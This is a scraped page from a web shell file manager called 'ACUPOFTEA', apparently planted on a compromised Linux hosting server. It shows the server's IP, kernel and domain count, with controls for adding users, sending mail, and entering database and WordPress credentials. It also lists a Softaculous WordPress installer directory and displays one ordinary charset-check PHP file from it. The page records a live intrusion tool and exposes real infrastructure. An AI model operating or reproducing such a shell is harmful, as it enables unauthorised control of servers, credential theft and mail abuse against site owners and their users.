System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
wp51
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
check_charset.php
<?php function __has_cap(){ global $use_mysqli; $use_mysqli = false; if ( function_exists( 'mysqli_connect' ) ) { if ( version_compare( phpversion(), '5.5', '>=' ) || ! function_exists( 'mysql_connect' ) ) { $use_mysqli = true; } elseif ( false !== strpos( '[[wpver]]', '-' ) ) { $use_mysqli = true; } } $version = __db_version(); if ( version_compare( $version, '5.5.3', '<' ) ) { return false; } if ( $use_mysqli ) { $client_version = mysqli_get_client_info(); } else { $client_version = mysql_get_client_info(); } /* * libmysql has supported utf8mb4 since 5.5.3, same as the MySQL server. * mysqlnd has supported utf8mb4 since 5.0.9. */ if ( false !== strpos( $client_version, 'mysqlnd' ) ) { $client_version = preg_replace( '/^\D+([\d.]+).*/', '$1', $client_version ); return version_compare( $client_version, '5.0.9', '>=' ); } else { return version_compare( $client_version, '5.5.3', '>=' ); } return false; } function __db_version() { global $use_mysqli; if ( $use_mysqli ) { $server_info = mysqli_get_server_info( mysqli_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]")); } else { $server_info = mysql_get_server_info( mysql_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]")); } return preg_replace( '/[^0-9.].*/', '', $server_info ); } $has_cap = __has_cap(); // To determine which colllation to use. Added from WP 5.4.2 $dbversion = __db_version(); if ( version_compare( $dbversion, '5.6', '>=' ) ) { $utf8mb4 = 'utf8mb4_520'; }else{ $utf8mb4 = 'utf8mb4'; } if(!empty($has_cap)){ echo '<claim_utf8>'.$utf8mb4.'</claim_utf8>'; } // Server detection /** * Whether the server software is Apache or something else * @global bool $soft_is_apache */ $soft_is_apache = (strpos($_SERVER['SERVER_SOFTWARE'], 'Apache') !== false || strpos($_SERVER['SERVER_SOFTWARE'], 'LiteSpeed') !== false); if(!empty($soft_is_apache)){ echo '<soft_apache>soft_is_apache</soft_apache>'; }else{ echo '<soft_apache>soft_not_apache</soft_apache>'; } ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-13 09:39:15
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-08-13 09:39:15
languages
DIR
-
drwxr-xr-x
2025-08-13 09:39:15
php53
DIR
-
drwxr-xr-x
2025-08-13 09:39:15
php56
DIR
-
drwxr-xr-x
2025-08-13 09:39:15
php71
DIR
-
drwxr-xr-x
2025-08-13 09:39:15
php81
DIR
-
drwxr-xr-x
2025-08-13 09:39:15
php82
DIR
-
drwxr-xr-x
2025-08-13 09:39:15
plugins
DIR
-
drwxr-xr-x
2025-08-13 09:39:15
.htaccess
text/plain
420 B
-rw-r--r--
2021-12-23 06:54:36
_htaccess
text/plain
266 B
-rw-r--r--
2021-12-23 06:54:36
_index.php
text/x-php
59 B
-rw-r--r--
2021-12-23 06:54:36
_wp-config.php
text/x-php
2.94 KB
-rw-r--r--
2021-12-23 06:54:36
add_user.php
text/x-php
461 B
-rw-r--r--
2021-12-23 06:54:36
backup.php
text/x-php
3.01 KB
-rw-r--r--
2025-08-13 03:15:46
check_charset.php
text/x-php
2.02 KB
-rw-r--r--
2021-12-23 06:54:36
clone.php
text/x-php
31.02 KB
-rw-r--r--
2025-08-13 03:15:46
clone.xml
text/html
497 B
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
9.43 KB
-rw-r--r--
2025-08-13 03:15:46
edit.xml
text/html
1.76 KB
-rw-r--r--
2023-10-03 04:59:48
extend.php
text/x-php
82.76 KB
-rw-r--r--
2025-08-13 03:15:46
fileindex.php
text/plain
291 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
6.55 KB
-rw-r--r--
2025-08-13 03:15:46
info.xml
text/html
14.91 KB
-rw-r--r--
2025-08-13 03:03:38
install.js
text/plain
1.46 KB
-rw-r--r--
2025-01-03 08:25:20
install.php
text/x-php
31.23 KB
-rw-r--r--
2025-08-13 03:15:46
install.xml
text/html
5.66 KB
-rw-r--r--
2025-02-24 02:15:58
md5
text/plain
4.67 KB
-rw-r--r--
2025-08-13 03:15:46
notes.txt
text/plain
5.26 KB
-rw-r--r--
2025-08-13 03:03:38
plugin_activate.php
text/x-php
596 B
-rw-r--r--
2021-12-23 06:54:36
plugin_deactivate.php
text/x-php
613 B
-rw-r--r--
2021-12-23 06:54:36
sign_on.php
text/x-php
3.28 KB
-rw-r--r--
2025-01-28 04:09:32
soft.htaccess
text/plain
127 B
-rw-r--r--
2021-12-23 06:54:36
upgrade.php
text/x-php
13.3 KB
-rw-r--r--
2025-08-13 03:15:46
upgrade.xml
text/html
1.6 KB
-rw-r--r--
2023-10-03 04:59:48
wp-config.php
text/x-php
2.67 KB
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com